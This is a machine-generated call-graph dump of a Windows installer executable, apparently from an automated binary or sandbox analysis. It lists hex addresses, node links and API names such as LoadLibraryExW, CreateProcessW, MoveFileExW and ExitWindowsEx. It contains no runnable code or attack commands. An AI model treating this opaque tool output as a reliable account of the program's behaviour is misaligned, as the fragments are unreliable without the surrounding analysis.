17 API calls 3705->3706 3707 40195d lstrlenW 3706->3707 3708 402638 3707->3708 3709 4014d7 3710 402d84 17 API calls 3709->3710 3711 4014dd Sleep 3710->3711 3713 402c2a 3711->3713 3714 4020d8 3715 40219c 3714->3715 3716 4020ea 3714->3716 3719 401423 24 API calls 3715->3719 3717 402da6 17 API calls 3716->3717 3718 4020f1 3717->3718 3720 402da6 17 API calls 3718->3720 3725 4022f6 3719->3725 3721 4020fa 3720->3721 3722 402110 LoadLibraryExW 3721->3722 3723 402102 GetModuleHandleW 3721->3723 3722->3715 3724 402121 3722->3724 3723->3722 3723->3724 3734 406956 3724->3734 3728 402132 3731 401423 24 API calls 3728->3731 3732 402142 3728->3732 3729 40216b 3730 40557c 24 API calls 3729->3730 3730->3732 3731->3732 3732->3725 3733 40218e FreeLibrary 3732->3733 3733->3725 3739 40653c WideCharToMultiByte 3734->3739 3736 406973 3737 40697a GetProcAddress 3736->3737 3738 40212c 3736->3738 3737->3738 3738->3728 3738->3729 3739->3736 3740 402b59 3741 402b60 3740->3741 3742 402bab 3740->3742 3744 402d84 17 API calls 3741->3744 3747 402ba9 3741->3747 3743 4068e7 5 API calls 3742->3743 3745 402bb2 3743->3745 3746 402b6e 3744->3746 3748 402da6 17 API calls 3745->3748 3750 402d84 17 API calls 3746->3750 3749 402bbb 3748->3749 3749->3747 3751 402bbf IIDFromString 3749->3751 3753 402b7a 3750->3753 3751->3747 3752 402bce 3751->3752 3752->3747 3758 40651a lstrcpynW 3752->3758 3757 406461 wsprintfW 3753->3757 3755 402beb CoTaskMemFree 3755->3747 3757->3747 3758->3755 3759 402a5b 3760 402d84 17 API calls 3759->3760 3761 402a61 3760->3761 3762 402aa4 3761->3762 3763 402a88 3761->3763 3769 40292e 3761->3769 3764 402abe 3762->3764 3765 402aae 3762->3765 3766 402a8d 3763->3766 3767 402a9e 3763->3767 3770 406557 17 API calls 3764->3770 3768 402d84 17 API calls 3765->3768 3773 40651a lstrcpynW 3766->3773 3767->3769 3774 406461 wsprintfW 3767->3774 3768->3767 3770->3767 3773->3769 3774->3769 3775 40175c 3776 402da6 17 API calls 3775->3776 3777 401763 3776->3777 3778 406039 2 API calls 3777->3778 3779 40176a 3778->3779 3779->3779 3780 401d5d 3781 402d84 17 API calls 3780->3781 3782 401d6e SetWindowLongW 3781->3782 3783 402c2a 3782->3783 3784 4028de 3785 4028e6 3784->3785 3786 4028ea FindNextFileW 3785->3786 3789 4028fc 3785->3789 3787 402943 3786->3787 3786->3789 3790 40651a lstrcpynW 3787->3790 3790->3789 3791 401563 3792 402ba4 3791->3792 3795 406461 wsprintfW 3792->3795 3794 402ba9 3795->3794 3796 404ee3 GetDlgItem GetDlgItem 3797 404f35 7 API calls 3796->3797 3804 40515a 3796->3804 3798 404fdc DeleteObject 3797->3798 3799 404fcf SendMessageW 3797->3799 3800 404fe5 3798->3800 3799->3798 3802 40501c 3800->3802 3803 406557 17 API calls 3800->3803 3801 40523c 3806 4052e8 3801->3806 3811 40514d 3801->3811 3816 405295 SendMessageW 3801->3816 3848 404476 3802->3848 3809 404ffe SendMessageW SendMessageW 3803->3809 3804->3801 3830 4051c9 3804->3830 3853 404e31 SendMessageW 3804->3853 3807 4052f2 SendMessageW 3806->3807 3808 4052fa 3806->3808 3807->3808 3818 405313 3808->3818 3819 40530c ImageList_Destroy 3808->3819 3827 405323 3808->3827 3809->3800 3810 405030 3815 404476 18 API calls 3810->3815 3870 4044dd 3811->3870 3812 40522e SendMessageW 3812->3801 3831 405041 3815->3831 3816->3811 3821 4052aa SendMessageW 3816->3821 3822 40531c GlobalFree 3818->3822 3818->3827 3819->3818 3820 40549d 3820->3811 3825 4054af ShowWindow GetDlgItem ShowWindow 3820->3825 3824 4052bd 3821->3824 3822->3827 3823 40511c GetWindowLongW SetWindowLongW 3826 405135 3823->3826 3832 4052ce SendMessageW 3824->3832 3825->3811 3828 405152 3826->3828 3829 40513a ShowWindow 3826->3829 3827->3820 3843 40535e 3827->3843 3858 404eb1 3827->3858 3852 4044ab SendMessageW 3828->3852 3851 4044ab SendMessageW 3829->3851 3830->3801 3830->3812 3831->3823 3833 405117 3831->3833 3836 405094 SendMessageW 3831->3836 3837 4050d2 SendMessageW 3831->3837 3838 4050e6 SendMessageW 3831->3838 3832->3806 3833->3823 3833->3826 3836->3831 3837->3831 3838->3831 3840 405468 3841 405473 InvalidateRect 3840->3841 3844 40547f 3840->3844 3841->3844 3842 40538c SendMessageW 3846 4053a2 3842->3846 3843->3842 3843->3846 3844->3820 3867 404dec 3844->3867 3845 405416 SendMessageW SendMessageW 3845->3846 3846->3840 3846->3845 3849 406557 17 API calls 3848->3849 3850 404481 SetDlgItemTextW 3849->3850 3850->3810 3851->3811 3852->3804 3854 404e90 SendMessageW 3853->3854 3855 404e54 GetMessagePos ScreenToClient SendMessageW 3853->3855 3856 404e88 3854->3856 3855->3856 3857 404e8d 3855->3857 3856->3830 3857->3854 3884 40651a lstrcpynW 3858->3884 3860 404ec4 3885 406461 wsprintfW 3860->3885 3862 404ece 3863 40140b 2 API calls 3862->3863 3864 404ed7 3863->3864 3886 40651a lstrcpynW 3864->3886 3866 404ede 3866->3843 3887 404d23 3867->3887 3869 404e01 3869->3820 3871 4044f5 GetWindowLongW 3870->3871 3881 4045a0 3870->3881 3872 40450a 3871->3872 3871->3881 3873 404537 GetSysColor 3872->3873 3874 40453a 3872->3874 3872->3881 3873->3874 3875 404540 SetTextColor 3874->3875 3876 40454a SetBkMode 3874->3876 3875->3876 3877 404562 GetSysColor 3876->3877 3878 404568 3876->3878 3877->3878 3879 404579 3878->3879 3880 40456f SetBkColor 3878->3880 3879->3881 3882 404593 CreateBrushIndirect 3879->3882 3883 40458c DeleteObject 3879->3883 3880->3879 3882->3881 3883->3882 3884->3860 3885->3862 3886->3866 3888 404d3c 3887->3888 3889 406557 17 API calls 3888->3889 3890 404da0 3889->3890 3891 406557 17 API calls 3890->3891 3892 404dab 3891->3892 3893 406557 17 API calls 3892->3893 3894 404dc1 lstrlenW wsprintfW SetDlgItemTextW 3893->3894 3894->3869 3895 4045e6 lstrlenW 3896 404605 3895->3896 3897 404607 WideCharToMultiByte 3895->3897 3896->3897 3898 404967 3899 404993 3898->3899 3900 4049a4 3898->3900 3959 405b5e GetDlgItemTextW 3899->3959 3902 4049b0 GetDlgItem 3900->3902 3905 404a0f 3900->3905 3904 4049c4 3902->3904 3903 40499e 3907 4067a1 5 API calls 3903->3907 3909 4049d8 SetWindowTextW 3904->3909 3914 405e94 4 API calls 3904->3914 3906 404af3 3905->3906 3910 406557 17 API calls 3905->3910 3957 404ca2 3905->3957 3906->3957 3961 405b5e GetDlgItemTextW 3906->3961 3907->3900 3912 404476 18 API calls 3909->3912 3915 404a83 SHBrowseForFolderW 3910->3915 3911 404b23 3916 405ef1 18 API calls 3911->3916 3917 4049f4 3912->3917 3913 4044dd 8 API calls 3918 404cb6 3913->3918 3919 4049ce 3914->3919 3915->3906 3920 404a9b CoTaskMemFree 3915->3920 3921 404b29 3916->3921 3922 404476 18 API calls 3917->3922 3919->3909 3923 405de9 3 API calls 3919->3923 3924 405de9 3 API calls 3920->3924 3962 40651a lstrcpynW 3921->3962 3925 404a02 3922->3925 3923->3909 3928 404aa8 3924->3928 3960 4044ab SendMessageW 3925->3960 3929 404adf SetDlgItemTextW 3928->3929 3934 406557 17 API calls 3928->3934 3929->3906 3930 404a08 3932 4068e7 5 API calls 3930->3932 3931 404b40 3933 4068e7 5 API calls 3931->3933 3932->3905 3941 404b47 3933->3941 3935 404ac7 lstrcmpiW 3934->3935 3935->3929 3938 404ad8 lstrcatW 3935->3938 3936 404b88 3963 40651a lstrcpynW 3936->3963 3938->3929 3939 404b8f 3940 405e94 4 API calls 3939->3940 3942 404b95 GetDiskFreeSpaceW 3940->3942 3941->3936 3944 405e35 2 API calls 3941->3944 3946 404be0 3941->3946 3945 404bb9 MulDiv 3942->3945 3942->3946 3944->3941 3945->3946 3947 404c51 3946->3947 3948 404dec 20 API calls 3946->3948 3949 404c74 3947->3949 3951 40140b 2 API calls 3947->3951 3950 404c3e 3948->3950 3964 404498 EnableWindow 3949->3964 3953 404c53 SetDlgItemTextW 3950->3953 3954 404c43 3950->3954 3951->3949 3953->3947 3956 404d23 20 API calls 3954->3956 3955 404c90 3955->3957 3965 4048c0 3955->3965 3956->3947 3957->3913 3959->3903 3960->3930 3961->3911 3962->3931 3963->3939 3964->3955 3966 4048d3 SendMessageW 3965->3966 3967 4048ce 3965->3967 3966->3957 3967->3966 3968 401968 3969 402d84 17 API calls 3968->3969 3970 40196f 3969->3970 3971 402d84 17 API calls 3970->3971 3972 40197c 3971->3972 3973 402da6 17 API calls 3972->3973 3974 401993 lstrlenW 3973->3974 3976 4019a4 3974->3976 3975 4019e5 3976->3975 3980 40651a lstrcpynW 3976->3980 3978 4019d5 3978->3975 3979 4019da lstrlenW 3978->3979 3979->3975 3980->3978 3981 40166a 3982 402da6 17 API calls 3981->3982 3983 401670 3982->3983 3984 406850 2 API calls 3983->3984 3985 401676 3984->3985 3986 402aeb 3987 402d84 17 API calls 3986->3987 3989 402af1 3987->3989 3988 40292e 3989->3988 3990 406557 17 API calls 3989->3990 3990->3988 3991 4026ec 3992 402d84 17 API calls 3991->3992 3999 4026fb 3992->3999 3993 402838 3994 402745 ReadFile 3994->3993 3994->3999 3995 40608d ReadFile 3995->3999 3997 402785 MultiByteToWideChar 3997->3999 3998 40283a 4013 406461 wsprintfW 3998->4013 3999->3993 3999->3994 3999->3995 3999->3997 3999->3998 4001 4027ab SetFilePointer MultiByteToWideChar 3999->4001 4002 40284b 3999->4002 4004 4060eb SetFilePointer 3999->4004 4001->3999 4002->3993 4003 40286c SetFilePointer 4002->4003 4003->3993 4005 406107 4004->4005 4012 40611f 4004->4012 4006 40608d ReadFile 4005->4006 4007 406113 4006->4007 4008 406150 SetFilePointer 4007->4008 4009 406128 SetFilePointer 4007->4009 4007->4012 4008->4012 4009->4008 4010 406133 4009->4010 4011 4060bc WriteFile 4010->4011 4011->4012 4012->3999 4013->3993 3516 40176f 3517 402da6 17 API calls 3516->3517 3518 401776 3517->3518 3519 401796 3518->3519 3520 40179e 3518->3520 3559 40651a lstrcpynW 3519->3559 3560 40651a lstrcpynW 3520->3560 3523 40179c 3527 4067a1 5 API calls 3523->3527 3524 4017a9 3525 405de9 3 API calls 3524->3525 3526 4017af lstrcatW 3525->3526 3526->3523 3530 4017bb 3527->3530 3528 4017c1 3529 406850 2 API calls 3528->3529 3528->3530 3533 4017cd CompareFileTime 3528->3533 3529->3528 3530->3528 3534 40188d 3530->3534 3535 401864 3530->3535 3537 40651a lstrcpynW 3530->3537 3543 406557 17 API calls 3530->3543 3552 405b7a MessageBoxIndirectW 3530->3552 3555 405fe5 GetFileAttributesW 3530->3555 3558 40600a GetFileAttributesW CreateFileW 3530->3558 3533->3528 3536 40557c 24 API calls 3534->3536 3539 40557c 24 API calls 3535->3539 3545 401879 3535->3545 3538 401897 3536->3538 3537->3530 3540 4032b4 31 API calls 3538->3540 3539->3545 3541 4018aa 3540->3541 3542 4018be SetFileTime 3541->3542 3544 4018d0 FindCloseChangeNotification 3541->3544 3542->3544 3543->3530 3544->3545 3546 4018e1 3544->3546 3547 4018e6 3546->3547 3548 4018f9 3546->3548 3550 406557 17 API calls 3547->3550 3549 406557 17 API calls 3548->3549 3551 401901 3549->3551 3553 4018ee lstrcatW 3550->3553 3554 405b7a MessageBoxIndirectW 3551->3554 3552->3530 3553->3551 3554->3545 3556 406004 3555->3556 3557 405ff7 SetFileAttributesW 3555->3557 3556->3530 3557->3556 3558->3530 3559->3523 3560->3524 3561 403aef 3562 403b07 3561->3562 3563 403af9 CloseHandle 3561->3563 3568 403b34 3562->3568 3563->3562 3569 403b42 3568->3569 3570 403b0c 3569->3570 3571 403b47 FreeLibrary GlobalFree 3569->3571 3572 405c26 3570->3572 3571->3570 3571->3571 3573 405ef1 18 API calls 3572->3573 3574 405c46 3573->3574 3575 405c65 3574->3575 3576 405c4e DeleteFileW 3574->3576 3577 405d85 3575->3577 3608 40651a lstrcpynW 3575->3608 3605 403b18 3576->3605 3584 406850 2 API calls 3577->3584 3577->3605 3579 405c8b 3580 405c91 lstrcatW 3579->3580 3581 405c9e 3579->3581 3582 405ca4 3580->3582 3583 405e35 2 API calls 3581->3583 3585 405cb4 lstrcatW 3582->3585 3587 405cbf lstrlenW FindFirstFileW 3582->3587 3583->3582 3586 405daa 3584->3586 3585->3587 3588 405de9 3 API calls 3586->3588 3586->3605 3587->3577 3589 405ce1 3587->3589 3590 405db4 3588->3590 3591 405d68 FindNextFileW 3589->3591 3601 405c26 60 API calls 3589->3601 3604 40557c 24 API calls 3589->3604 3606 40557c 24 API calls 3589->3606 3607 4062da 36 API calls 3589->3607 3609 40651a lstrcpynW 3589->3609 3610 405bde 3589->3610 3592 405bde 5 API calls 3590->3592 3591->3589 3594 405d7e FindClose 3591->3594 3595 405dc0 3592->3595 3594->3577 3596 405dda 3595->3596 3599 405dc4 3595->3599 3598 40557c 24 API calls 3596->3598 3598->3605 3600 40557c 24 API calls 3599->3600 3599->3605 3602 405dd1 3600->3602 3601->3589 3603 4062da 36 API calls 3602->3603 3603->3605 3604->3591 3606->3589 3607->3589 3608->3579 3609->3589 3611 405fe5 2 API calls 3610->3611 3612 405bea 3611->3612 3613 405c01 DeleteFileW 3612->3613 3614 405bf9 RemoveDirectoryW 3612->3614 3615 405c0b 3612->3615 3616 405c07 3613->3616 3614->3616 3615->3589 3616->3615 3617 405c17 SetFileAttributesW 3616->3617 3617->3615 4014 4054f0 4015 405500 4014->4015 4016 405514 4014->4016 4018 405506 4015->4018 4026 40555d 4015->4026 4017 40551c IsWindowVisible 4016->4017 4020 405533 4016->4020 4019 405529 4017->4019 4017->4026 4022 4044c2 SendMessageW 4018->4022 4024 404e31 5 API calls 4019->4024 4021 405562 CallWindowProcW 4020->4021 4025 404eb1 4 API calls 4020->4025 4023 405510 4021->4023 4022->4023 4024->4020 4025->4026 4026->4021 4027 401a72 4028 402d84 17 API calls 4027->4028 4029 401a7b 4028->4029 4030 402d84 17 API calls 4029->4030 4031 401a20 4030->4031 4032 401573 4033 401583 ShowWindow 4032->4033 4034 40158c 4032->4034 4033->4034 4035 402c2a 4034->4035 4036 40159a ShowWindow 4034->4036 4036->4035 4037 4023f4 4038 402da6 17 API calls 4037->4038 4039 402403 4038->4039 4040 402da6 17 API calls 4039->4040 4041 40240c 4040->4041 4042 402da6 17 API calls 4041->4042 4043 402416 GetPrivateProfileStringW 4042->4043 4044 4014f5 SetForegroundWindow 4045 402c2a 4044->4045 4046 401ff6 4047 402da6 17 API calls 4046->4047 4048 401ffd 4047->4048 4049 406850 2 API calls 4048->4049 4050 402003 4049->4050 4052 402014 4050->4052 4053 406461 wsprintfW 4050->4053 4053->4052 4054 403f77 4055 4040f0 4054->4055 4056 403f8f 4054->4056 4058 404101 GetDlgItem GetDlgItem 4055->4058 4059 404141 4055->4059 4056->4055 4057 403f9b 4056->4057 4061 403fa6 SetWindowPos 4057->4061 4062 403fb9 4057->4062 4063 404476 18 API calls 4058->4063 4060 40419b 4059->4060 4071 401389 2 API calls 4059->4071 4064 4044c2 SendMessageW 4060->4064 4080 4040eb 4060->4080 4061->4062 4065 403fc2 ShowWindow 4062->4065 4066 404004 4062->4066 4067 40412b SetClassLongW 4063->4067 4115 4041ad 4064->4115 4072 403fe2 GetWindowLongW 4065->4072 4092 4040ae 4065->4092 4068 404023 4066->4068 4069 40400c DestroyWindow 4066->4069 4070 40140b 2 API calls 4067->4070 4073 404028 SetWindowLongW 4068->4073 4074 404039 4068->4074 4124 4043ff 4069->4124 4070->4059 4075 404173 4071->4075 4077 403ffb ShowWindow 4072->4077 4072->4092 4073->4080 4078 404045 GetDlgItem 4074->4078 4074->4092 4075->4060 4079 404177 SendMessageW 4075->4079 4076 4044dd 8 API calls 4076->4080 4077->4066 4083 404056 SendMessageW IsWindowEnabled 4078->4083 4087 404073 4078->4087 4079->4080 4081 40140b 2 API calls 4081->4115 4082 404401 DestroyWindow EndDialog 4082->4124 4083->4080 4083->4087 4084 404430 ShowWindow 4084->4080 4085 406557 17 API calls 4085->4115 4086 404080 4090 4040c7 SendMessageW 4086->4090 4097 404078 4086->4097 4087->4086 4087->4090 4091 404093 4087->4091 4087->4097 4089 404476 18 API calls 4089->4115 4090->4092 4093 4040b0 4091->4093 4094 40409b 4091->4094 4092->4076 4095 40140b 2 API calls 4093->4095 4096 40140b 2 API calls 4094->4096 4095->4097 4096->4097 4097->4092 4125 40444f 4097->4125 4098 404476 18 API calls 4099 404228 GetDlgItem 4098->4099 4100 404245 ShowWindow EnableWindow 4099->4100 4101 40423d 4099->4101 4128 404498 EnableWindow 4100->4128 4101->4100 4103 40426f EnableWindow 4108 404283 4103->4108 4104 404288 GetSystemMenu EnableMenuItem SendMessageW 4105 4042b8 SendMessageW 4104->4105 4104->4108 4105->4108 4107 403f58 18 API calls 4107->4108 4108->4104 4108->4107 4129 4044ab SendMessageW 4108->4129 4130 40651a lstrcpynW 4108->4130 4110 4042e7 lstrlenW 4111 406557 17 API calls 4110->4111 4112 4042fd SetWindowTextW 4111->4112 4113 401389 2 API calls 4112->4113 4113->4115 4114 404341 DestroyWindow 4116 40435b CreateDialogParamW 4114->4116 4114->4124 4115->4080 4115->4081 4115->4082 4115->4085 4115->4089 4115->4098 4115->4114 4117 40438e 4116->4117 4116->4124 4118 404476 18 API calls 4117->4118 4119 404399 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4118->4119 4120 401389 2 API calls 4119->4120 4121 4043df 4120->4121 4121->4080 4122 4043e7 ShowWindow 4121->4122 4123 4044c2 SendMessageW 4122->4123 4123->4124 4124->4080 4124->4084 4126 404456 4125->4126 4127 40445c SendMessageW 4125->4127 4126->4127 4127->4092 4128->4103 4129->4108 4130->4110 4131 401b77 4132 402da6 17 API calls 4131->4132 4133 401b7e 4132->4133 4134 402d84 17 API calls 4133->4134 4135 401b87 wsprintfW 4134->4135 4136 402c2a 4135->4136 4137 40167b 4138 402da6 17 API calls 4137->4138 4139 401682 4138->4139 4140 402da6 17 API calls 4139->4140 4141 40168b 4140->4141 4142 402da6 17 API calls 4141->4142 4143 401694 MoveFileW 4142->4143 4144 4016a0 4143->4144 4145 4016a7 4143->4145 4147 401423 24 API calls 4144->4147 4146 406850 2 API calls 4145->4146 4149 4022f6 4145->4149 4148 4016b6 4146->4148 4147->4149 4148->4149 4150 4062da 36 API calls 4148->4150 4150->4144 4151 4019ff 4152 402da6 17 API calls 4151->4152 4153 401a06 4152->4153 4154 402da6 17 API calls 4153->4154 4155 401a0f 4154->4155 4156 401a16 lstrcmpiW 4155->4156 4157 401a28 lstrcmpW 4155->4157 4158 401a1c 4156->4158 4157->4158 4159 4022ff 4160 402da6 17 API calls 4159->4160 4161 402305 4160->4161 4162 402da6 17 API calls 4161->4162 4163 40230e 4162->4163 4164 402da6 17 API calls 4163->4164 4165 402317 4164->4165 4166 406850 2 API calls 4165->4166 4167 402320 4166->4167 4168 402331 lstrlenW lstrlenW 4167->4168 4169 402324 4167->4169 4170 40557c 24 API calls 4168->4170 4171 40557c 24 API calls 4169->4171 4173 40232c 4169->4173 4172 40236f SHFileOperationW 4170->4172 4171->4173 4172->4169 4172->4173 4174 401000 4175 401037 BeginPaint GetClientRect 4174->4175 4177 40100c DefWindowProcW 4174->4177 4178 4010f3 4175->4178 4179 401179 4177->4179 4180 401073 CreateBrushIndirect FillRect DeleteObject 4178->4180 4181 4010fc 4178->4181 4180->4178 4182 401102 CreateFontIndirectW 4181->4182 4183 401167 EndPaint 4181->4183 4182->4183 4184 401112 6 API calls 4182->4184 4183->4179 4184->4183 4185 401d81 4186 401d94 GetDlgItem 4185->4186 4187 401d87 4185->4187 4189 401d8e 4186->4189 4188 402d84 17 API calls 4187->4188 4188->4189 4190 401dd5 GetClientRect LoadImageW SendMessageW 4189->4190 4191 402da6 17 API calls 4189->4191 4193 401e33 4190->4193 4195 401e3f 4190->4195 4191->4190 4194 401e38 DeleteObject 4193->4194 4193->4195 4194->4195 4196 401503 4197 40150b 4196->4197 4199 40151e 4196->4199 4198 402d84 17 API calls 4197->4198 4198->4199 4200 402383 4201 40238a 4200->4201 4203 40239d 4200->4203 4202 406557 17 API calls 4201->4202 4204 402397 4202->4204 4205 405b7a MessageBoxIndirectW 4204->4205 4205->4203 4206 402c05 SendMessageW 4207 402c2a 4206->4207 4208 402c1f InvalidateRect 4206->4208 4208->4207 4209 403b87 4210 403b92 4209->4210 4211 403b96 4210->4211 4212 403b99 GlobalAlloc 4210->4212 4212->4211 3170 401389 3172 401390 3170->3172 3171 4013fe 3172->3171 3173 4013cb MulDiv SendMessageW 3172->3173 3173->3172 3174 40350a SetErrorMode GetVersionExW 3175 40355c GetVersionExW 3174->3175 3176 403594 3174->3176 3175->3176 3177 4035ed 3176->3177 3178 4068e7 5 API calls 3176->3178 3179 406877 3 API calls 3177->3179 3178->3177 3180 403603 lstrlenA 3179->3180 3180->3177 3181 403613 3180->3181 3182 4068e7 5 API calls 3181->3182 3183 40361a 3182->3183 3184 4068e7 5 API calls 3183->3184 3185 403621 3184->3185 3186 4068e7 5 API calls 3185->3186 3187 40362d #17 OleInitialize SHGetFileInfoW 3186->3187 3264 40651a lstrcpynW 3187->3264 3190 40367a GetCommandLineW 3265 40651a lstrcpynW 3190->3265 3192 40368c 3193 405e16 CharNextW 3192->3193 3194 4036b2 CharNextW 3193->3194 3202 4036c3 3194->3202 3195 4037c1 3196 4037d5 GetTempPathW 3195->3196 3266 4034d9 3196->3266 3198 4037ed 3199 4037f1 GetWindowsDirectoryW lstrcatW 3198->3199 3200 403847 DeleteFileW 3198->3200 3203 4034d9 12 API calls 3199->3203 3276 40307d GetTickCount GetModuleFileNameW 3200->3276 3201 405e16 CharNextW 3201->3202 3202->3195 3202->3201 3208 4037c3 3202->3208 3205 40380d 3203->3205 3205->3200 3207 403811 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3205->3207 3206 40385a 3209 403a36 ExitProcess OleUninitialize 3206->3209 3213 40390f 3206->3213 3219 405e16 CharNextW 3206->3219 3212 4034d9 12 API calls 3207->3212 3361 40651a lstrcpynW 3208->3361 3210 403a46 3209->3210 3211 403a5b 3209->3211 3388 405b7a 3210->3388 3216 403a63 GetCurrentProcess OpenProcessToken 3211->3216 3217 403ad9 ExitProcess 3211->3217 3218 40383f 3212->3218 3304 403bc9 3213->3304 3224 403aa9 3216->3224 3225 403a7a LookupPrivilegeValueW AdjustTokenPrivileges 3216->3225 3218->3200 3218->3209 3230 40387c 3219->3230 3221 40391e 3221->3209 3226 4068e7 5 API calls 3224->3226 3225->3224 3229 403ab0 3226->3229 3227 4038e5 3362 405ef1 3227->3362 3228 403926 3231 405ae5 5 API calls 3228->3231 3233 403ac5 ExitWindowsEx 3229->3233 3234 403ad2 3229->3234 3230->3227 3230->3228 3235 40392b lstrcatW 3231->3235 3233->3217 3233->3234 3392 40140b 3234->3392 3238 403947 lstrcatW lstrcmpiW 3235->3238 3239 40393c lstrcatW 3235->3239 3238->3221 3240 403967 3238->3240 3239->3238 3242 403973 3240->3242 3243 40396c 3240->3243 3246 405ac8 2 API calls 3242->3246 3245 405a4b 4 API calls 3243->3245 3244 403904 3378 40651a lstrcpynW 3244->3378 3248 403971 3245->3248 3249 403978 SetCurrentDirectoryW 3246->3249 3248->3249 3250 403995 3249->3250 3251 40398a 3249->3251 3380 40651a lstrcpynW 3250->3380 3379 40651a lstrcpynW 3251->3379 3254 4039a2 3255 406557 17 API calls 3254->3255 3258 403a2d 3254->3258 3261 406557 17 API calls 3254->3261 3263 403a17 CloseHandle 3254->3263 3381 4062da MoveFileExW 3254->3381 3385 405afd CreateProcessW 3254->3385 3256 4039d7 DeleteFileW 3255->3256 3256->3254 3257 4039e3 CopyFileW 3256->3257 3257->3254 3259 4062da 36 API calls 3258->3259 3259->3221 3261->3254 3263->3254 3264->3190 3265->3192 3267 4067a1 5 API calls 3266->3267 3268 4034e5 3267->3268 3269 4034ef 3268->3269 3395 405de9 lstrlenW CharPrevW 3268->3395 3269->3198 3272 405ac8 2 API calls 3273 4034fd 3272->3273 3398 406039 3273->3398 3402 40600a GetFileAttributesW CreateFileW 3276->3402 3278 4030bd 3297 4030cd 3278->3297 3403 40651a lstrcpynW 3278->3403 3280 4030e3 3404 405e35 lstrlenW 3280->3404 3284 4030f4 GetFileSize 3285 4031ee 3284->3285 3303 40310b 3284->3303 3409 403019 3285->3409 3287 4031f7 3289 403227 GlobalAlloc 3287->3289 3287->3297 3444 4034c2 SetFilePointer 3287->3444 3420 4034c2 SetFilePointer 3289->3420 3290 40325a 3294 403019 6 API calls 3290->3294 3293 403242 3421 4032b4 3293->3421 3294->3297 3295 403210 3298 4034ac ReadFile 3295->3298 3297->3206 3300 40321b 3298->3300 3299 403019 6 API calls 3299->3303 3300->3289 3300->3297 3301 40324e 3301->3297 3301->3301 3302 40328b SetFilePointer 3301->3302 3302->3297 3303->3285 3303->3290 3303->3297 3303->3299 3441 4034ac 3303->3441 3305 4068e7 5 API calls 3304->3305 3306 403bdd 3305->3306 3307 403be3 GetUserDefaultUILanguage 3306->3307 3308 403bf5 3306->3308 3450 406461 wsprintfW 3307->3450 3310 4063e8 3 API calls 3308->3310 3312 403c25 3310->3312 3311 403bf3 3451 403e9f 3311->3451 3313 403c44 lstrcatW 3312->3313 3314 4063e8 3 API calls 3312->3314 3313->3311 3314->3313 3317 405ef1 18 API calls 3318 403c76 3317->3318 3319 403d0a 3318->3319 3321 4063e8 3 API calls 3318->3321 3320 405ef1 18 API calls 3319->3320 3322 403d10 3320->3322 3323 403ca8 3321->3323 3324 403d20 LoadImageW 3322->3324 3325 406557 17 API calls 3322->3325 3323->3319 3328 403cc9 lstrlenW 3323->3328 3331 405e16 CharNextW 3323->3331 3326 403dc6 3324->3326 3327 403d47 RegisterClassW 3324->3327 3325->3324 3330 40140b 2 API calls 3326->3330 3329 403d7d SystemParametersInfoW CreateWindowExW 3327->3329 3337 403dd0 3327->3337 3332 403cd7 lstrcmpiW 3328->3332 3333 403cfd 3328->3333 3329->3326 3338 403dcc 3330->3338 3335 403cc6 3331->3335 3332->3333 3336 403ce7 GetFileAttributesW 3332->3336 3334 405de9 3 API calls 3333->3334 3340 403d03 3334->3340 3335->3328 3341 403cf3 3336->3341 3337->3221 3338->3337 3339 403e9f 18 API calls 3338->3339 3342 403ddd 3339->3342 3459 40651a lstrcpynW 3340->3459 3341->3333 3344 405e35 2 API calls 3341->3344 3345 403de9 ShowWindow 3342->3345 3346 403e6c 3342->3346 3344->3333 3347 406877 3 API calls 3345->3347 3460 40564f OleInitialize 3346->3460 3350 403e01 3347->3350 3349 403e72 3351 403e76 3349->3351 3352 403e8e 3349->3352 3353 403e0f GetClassInfoW 3350->3353 3355 406877 3 API calls 3350->3355 3351->3337 3358 40140b 2 API calls 3351->3358 3354 40140b 2 API calls 3352->3354 3356 403e23 GetClassInfoW RegisterClassW 3353->3356 3357 403e39 DialogBoxParamW 3353->3357 3354->3337 3355->3353 3356->3357 3359 40140b 2 API calls 3357->3359 3358->3337 3360 403e61 3359->3360 3360->3337 3361->3196 3478 40651a lstrcpynW 3362->3478 3364 405f02 3365 405e94 4 API calls 3364->3365 3366 405f08 3365->3366 3367 4038f1 3366->3367 3368 4067a1 5 API calls 3366->3368 3367->3209 3377 40651a lstrcpynW 3367->3377 3369 405f18 3368->3369 3369->3367 3375 405f2f 3369->3375 3370 405f49 lstrlenW 3371 405f54 3370->3371 3370->3375 3372 405de9 3 API calls 3371->3372 3374 405f59 GetFileAttributesW 3372->3374 3374->3367 3375->3367 3375->3370 3376 405e35 2 API calls 3375->3376 3479 406850 FindFirstFileW 3375->3479 3376->3370 3377->3244 3378->3213 3379->3250 3380->3254 3382 4062fb 3381->3382 3383 4062ee 3381->3383 3382->3254 3482 406160 3383->3482 3386 405b30 CloseHandle 3385->3386 3387 405b3c 3385->3387 3386->3387 3387->3254 3389 405b8f 3388->3389 3390 403a53 ExitProcess 3389->3390 3391 405ba3 MessageBoxIndirectW 3389->3391 3391->3390 3393 401389 2 API calls 3392->3393 3394 401420 3393->3394 3394->3217 3396 4034f7 3395->3396 3397 405e05 lstrcatW 3395->3397 3396->3272 3397->3396 3399 406046 GetTickCount GetTempFileNameW 3398->3399 3400 403508 3399->3400 3401 40607c 3399->3401 3400->3198 3401->3399 3401->3400 3402->3278 3403->3280 3405 405e43 3404->3405 3406 4030e9 3405->3406 3407 405e49 CharPrevW 3405->3407 3408 40651a lstrcpynW 3406->3408 3407->3405 3407->3406 3408->3284 3410 403022 3409->3410 3411 40303a 3409->3411 3412 403032 3410->3412 3413 40302b DestroyWindow 3410->3413 3414 403042 3411->3414 3415 40304a GetTickCount 3411->3415 3412->3287 3413->3412 3416 406923 2 API calls 3414->3416 3417 403058 CreateDialogParamW ShowWindow 3415->3417 3418 40307b 3415->3418 3419 403048 3416->3419 3417->3418 3418->3287 3419->3287 3420->3293 3422 4032cd 3421->3422 3423 4032fb 3422->3423 3447 4034c2 SetFilePointer 3422->3447 3425 4034ac ReadFile 3423->3425 3426 403306 3425->3426 3427 40342f 3426->3427 3428 403445 3426->3428 3429 403318 GetTickCount 3426->3429 3427->3301 3430 403487 3428->3430 3434 403449 3428->3434 3429->3427 3431 403344 3429->3431 3433 4034ac ReadFile 3430->3433 3431->3427 3432 4034ac ReadFile 3431->3432 3437 40339a GetTickCount 3431->3437 3438 4033bf MulDiv wsprintfW 3431->3438 3445 4060bc WriteFile 3431->3445 3432->3431 3433->3427 3434->3427 3435 4034ac ReadFile 